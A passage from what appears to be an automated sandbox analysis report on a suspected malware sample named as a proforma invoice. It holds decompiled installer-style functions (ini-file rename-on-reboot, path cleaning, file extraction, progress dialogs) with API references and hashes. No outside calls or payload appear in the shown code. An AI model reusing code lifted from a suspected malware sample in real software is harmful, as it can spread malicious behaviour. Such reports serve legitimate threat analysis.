							if(E004057B2(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057B2(_t26 + 0xa, 0x409350);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004057FE(_t51 + _t29, 0x421ca8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B66(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040583D(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422630, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x004058ba
0x004058c1
0x004058c5
0x004058ce
0x004058d2
0x00405a11
0x00405a11
0x00000000
0x00405a11
0x004058d2
0x004058de
0x004058f4
0x0040591c
0x00405927
0x0040592b
0x0040594b
0x00405952
0x0040595c
0x00405969
0x0040596e
0x00405973
0x00405977
0x00000000
0x00000000
0x00405986
0x00405988
0x00405995
0x00405999
0x00405a0a
0x00405a0b
0x00000000
0x004059b5
0x004059c2
0x00405a27
0x00405a2e
0x004059d5
0x004059d5
0x004059d7
0x004059e0
0x004059eb
0x004059fd
0x00405a04
0x00000000
0x00405a04
0x00405a30
0x00405a31
0x00405a36
0x00405a38
0x00405a45
0x00405a45
0x00405a49
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a3a
0x00405a3a
0x00405a3d
0x00405a40
0x00405a41
0x00000000
0x00405a3a
0x004059cd
0x004059d2
0x00000000
0x004059d2
0x00405999
0x004058f6
0x00405901
0x0040590a
0x0040590e
0x00000000
0x00000000
0x0040590e
0x00405a1b

APIs

Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405649,?,00000000,000000F1,?), ref: 00405901
GetShortPathNameA.KERNEL32(?,00422630,00000400), ref: 0040590A
GetShortPathNameA.KERNEL32(00000000,004220A8,00000400), ref: 00405927
wsprintfA.USER32 ref: 00405945
GetFileSize.KERNEL32(00000000,00000000,004220A8,C0000000,00000004,004220A8,?,?,?,00000000,000000F1,?), ref: 00405980
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 0040598F
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059A5
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA8,00000000,-0000000A,00409350,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059EB
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004059FD
GlobalFree.KERNEL32 ref: 00405A04
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A0B

Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9

Strings

%s=%s, xrefs: 0040593B
0&B, xrefs: 004058EF
[Rename], xrefs: 004059B5, 004059C7

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$0&B$[Rename]
API String ID: 3772915668-951905037
Opcode ID: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
Instruction ID: 8912a0e40cac8f66f34925055924fb713260e7a12edb00ecfb1cfbef244c1689
Opcode Fuzzy Hash: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
Instruction Fuzzy Hash: D9411332B05B11BBD3216B61AD88F6B3A5CDB84715F140136FE05F22C2E678A801CEBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC8, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DC8(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056C6(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405684("*?|<>/\":", _t5))) == 0) {
							E004057FE(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405dca
0x00405dd2
0x00405de6
0x00405de6
0x00405dec
0x00405df9
0x00405df9
0x00405dfa
0x00405dfc
0x00405e00
0x00405e02
0x00405e0b
0x00405e0d
0x00405e27
0x00405e2f
0x00405e2f
0x00405e34
0x00405e36
0x00405e38
0x00405e3c
0x00405e3d
0x00405e40
0x00405e48
0x00405e4a
0x00405e4e
0x00000000
0x00000000
0x00405e54
0x00405e59
0x00000000
0x00000000
0x00000000
0x00405e59
0x00405e5e

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42

Strings

*?|<>/":, xrefs: 00405E10
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DC9, 00405E04
"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" , xrefs: 00405DCE

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-178355378
Opcode ID: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
Instruction ID: 3b6179abbfe29fc78842bf11aa846075366cc437f950451d76d565b88bc2b460
Opcode Fuzzy Hash: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
Instruction Fuzzy Hash: A0110861805B9129EB3227284C48BBB7F89CF66754F18447FD8C4722C2C67C5D429FAD

Uniqueness

Uniqueness Score: -1.00%

Function 00403F7F, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F7F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403f91
0x00404025
0x00000000
0x00404025
0x00403fa2
0x00403fa6
0x00000000
0x00000000
0x00403fac
0x00403fb5
0x00403fb8
0x00403fb8
0x00403fbe
0x00403fc4
0x00403fc4
0x00403fd0
0x00403fd6
0x00403fdd
0x00403fe0
0x00403fe3
0x00403fe5
0x00403fe5
0x00403fed
0x00403ff3
0x00403ff3
0x00403ffd
0x00404002
0x00404005
0x0040400a
0x0040400d
0x0040400d
0x0040401d
0x0040401d
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403F9C
GetSysColor.USER32(00000000), ref: 00403FB8
SetTextColor.GDI32(?,00000000), ref: 00403FC4
SetBkMode.GDI32(?,?), ref: 00403FD0
GetSysColor.USER32(?), ref: 00403FE3
SetBkColor.GDI32(?,?), ref: 00403FF3
DeleteObject.GDI32(?), ref: 0040400D
CreateBrushIndirect.GDI32(?), ref: 00404017

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: 4cc26f8bf5fc777f430f8318c3ba194748f169832e683f7fcd21add738ba3f9d
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: C221C371904705ABCB209F78DD08B4BBBF8AF40711F048A29F992F26E0C738E904CB55

Uniqueness

Uniqueness Score: -1.00%

Function 6F7324D8, Relevance: 10.6, APIs: 7, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6F7324D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E6F731215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M6F732626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x6f73307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x6f73309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E6F731429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x6f73405c);
								goto L17;
							case 4:
								__ecx =  *0x6f73405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x6f73405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x6f73405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x6f734000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E6F7312D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E6F731266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}

0x6f7324e4
0x6f7324e6
0x6f7324f0
0x6f7324f6
0x6f732500
0x6f732504
0x6f732509
0x6f732509
0x6f732511
0x6f732518
0x6f73251e
0x00000000
0x6f732525
0x00000000
0x00000000
0x6f73252c
0x6f732530
0x6f732533
0x6f732537
0x6f73253e
0x6f732542
0x6f732548
0x6f73254a
0x6f73254c
0x6f73254c
0x6f732553
0x00000000
0x00000000
0x6f73255c
0x00000000
0x00000000
0x6f73256c
0x00000000
0x00000000
0x6f732598
0x6f7325a0
0x6f7325aa
0x6f7325ac
0x6f7325b1
0x00000000
0x00000000
0x6f732574
0x6f732578
0x6f73257a
0x6f73257b
0x6f73257d
0x6f73258d
0x6f732594
0x00000000
0x00000000
0x6f7325b7
0x6f7325b9
0x6f7325bf
0x6f7325c5
0x6f7325c5
0x00000000
0x00000000
0x6f73251e
0x6f7325c8
0x6f7325c8
0x6f7325cd
0x6f7325de
0x6f7325de
0x6f7325e4
0x6f7325e9
0x6f7325ee
0x6f7325fa
0x6f7325ff
0x00000000
0x6f732604
0x6f7325f0
0x6f7325f1
0x6f732605
0x6f732605
0x6f7325ee
0x6f732606
0x6f73260a
0x6f73260d
0x6f732625

APIs

Part of subcall function 6F731215: GlobalAlloc.KERNELBASE(00000040,6F731233,?,6F7312CF,-6F73404B,6F7311AB,-000000A0), ref: 6F73121D

GlobalFree.KERNEL32 ref: 6F7325DE
GlobalFree.KERNEL32 ref: 6F732618

Memory Dump Source

Source File: 00000000.00000002.658919807.000000006F731000.00000020.00020000.sdmp, Offset: 6F730000, based on PE: true

Associated: 00000000.00000002.658908947.000000006F730000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658929430.000000006F733000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658938298.000000006F735000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f730000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 8c603ccbd2d71879600261a88c61a39b4a85ce97347e5b823fbe88147a0d1a01
Instruction ID: a7b2c954d9e9a015cf8c80d739080a9f6cace70dc39e6d63292f446608320f5e
Opcode Fuzzy Hash: 8c603ccbd2d71879600261a88c61a39b4a85ce97347e5b823fbe88147a0d1a01
Instruction Fuzzy Hash: FA41C173A08220FFDB258F64DE98C2A77BAFB86315B0045BEF54187151D731AA14DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056C6(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E0040581E(_t52);
				_t27 = E0040583D(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031F1(_t47);
						E004031BF(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F18(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004057FE( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F18(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x0040267c
0x0040267e
0x0040268a
0x0040268d
0x00402697
0x0040269b
0x0040269b
0x004026a1
0x004026ae
0x004026b6
0x004026b9
0x004026bf
0x004026cd
0x004026d2
0x004026d6
0x004026d9
0x004026e2
0x004026ee
0x004026f2
0x004026f5
0x004026ff
0x0040271e
0x00402706
0x0040270b
0x00402713
0x00402716
0x0040271b
0x0040271b
0x00402725
0x00402725
0x00402737
0x0040273e
0x00402750
0x00402750
0x00402756
0x00402756
0x00402761
0x00402762
0x00402766
0x0040276a
0x00402770
0x00402770
0x00402777
0x00402164
0x0040288e
0x0040289a

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
GlobalFree.KERNEL32 ref: 00402725
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
GlobalFree.KERNEL32 ref: 0040273E
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
Instruction ID: 719c612f4f238206e278f6e296a81204df483451b361404a9b6a09c3536a307a
Opcode Fuzzy Hash: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
Instruction Fuzzy Hash: F831AD71C00128BBDF216FA4CD89DAE7E79EF08364F10423AF920772E0C6795D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404F04, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F04(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405B88(0, _t39, 0x41fc78, 0x41fc78, _a4);
					}
					_t26 = lstrlenA(0x41fc78);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc78);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc78;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc78)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc78, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404f0a
0x00404f16
0x00404f19
0x00404f1f
0x00404f2b
0x00404f2e
0x00404f31
0x00404f37
0x00404f37
0x00404f3d
0x00404f45
0x00404f48
0x00404f65
0x00404f69
0x00404f72
0x00404f72
0x00404f7c
0x00404f85
0x00404f91
0x00404f98
0x00404f9c
0x00404f9f
0x00404fb2
0x00404fc0
0x00404fc0
0x00404fc4
0x00404fc6
0x00404fc9
0x00000000
0x00404fc9
0x00404f4a
0x00404f52
0x00404f5a
0x00404f60
0x00000000
0x00404f60
0x00404f5a
0x00404f48
0x00404fd3

APIs

lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
Instruction ID: 33d69ec58002f5e3cec48cf4aa7ac502a1da6879986bf9ca4026f821734cd723
Opcode Fuzzy Hash: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
Instruction Fuzzy Hash: C4219D71A00108BBDF119FA5CD849DEBFB9EB49354F14807AFA04B6290C3389E45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402BD3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BD3(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41704c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41704c = 0;
					return _t15;
				}
				__eflags =  *0x41704c; // 0x0
				if(__eflags != 0) {
					return E00405EC1(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B3B, 0);
						 *0x41704c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BB7());
						return E00404F04(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402bdf
0x00402be1
0x00402be8
0x00402beb
0x00402beb
0x00402bf1
0x00000000
0x00402bf1
0x00402bf9
0x00402bff
0x00000000
0x00402c02
0x00402c09
0x00402c0f
0x00402c15
0x00402c17
0x00402c1d
0x00402c5b
0x00402c64
0x00000000
0x00402c69
0x00402c1f
0x00402c26
0x00402c37
0x00000000
0x00402c45
0x00402c26
0x00402c71

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BEB
GetTickCount.KERNEL32 ref: 00402C09
wsprintfA.USER32 ref: 00402C37

Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0

CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C5B
ShowWindow.USER32(00000000,00000005), ref: 00402C69

Part of subcall function 00402BB7: MulDiv.KERNEL32(00000000,00000064,?), ref: 00402BCC

Strings

... %d%%, xrefs: 00402C31

Memory Dump Source

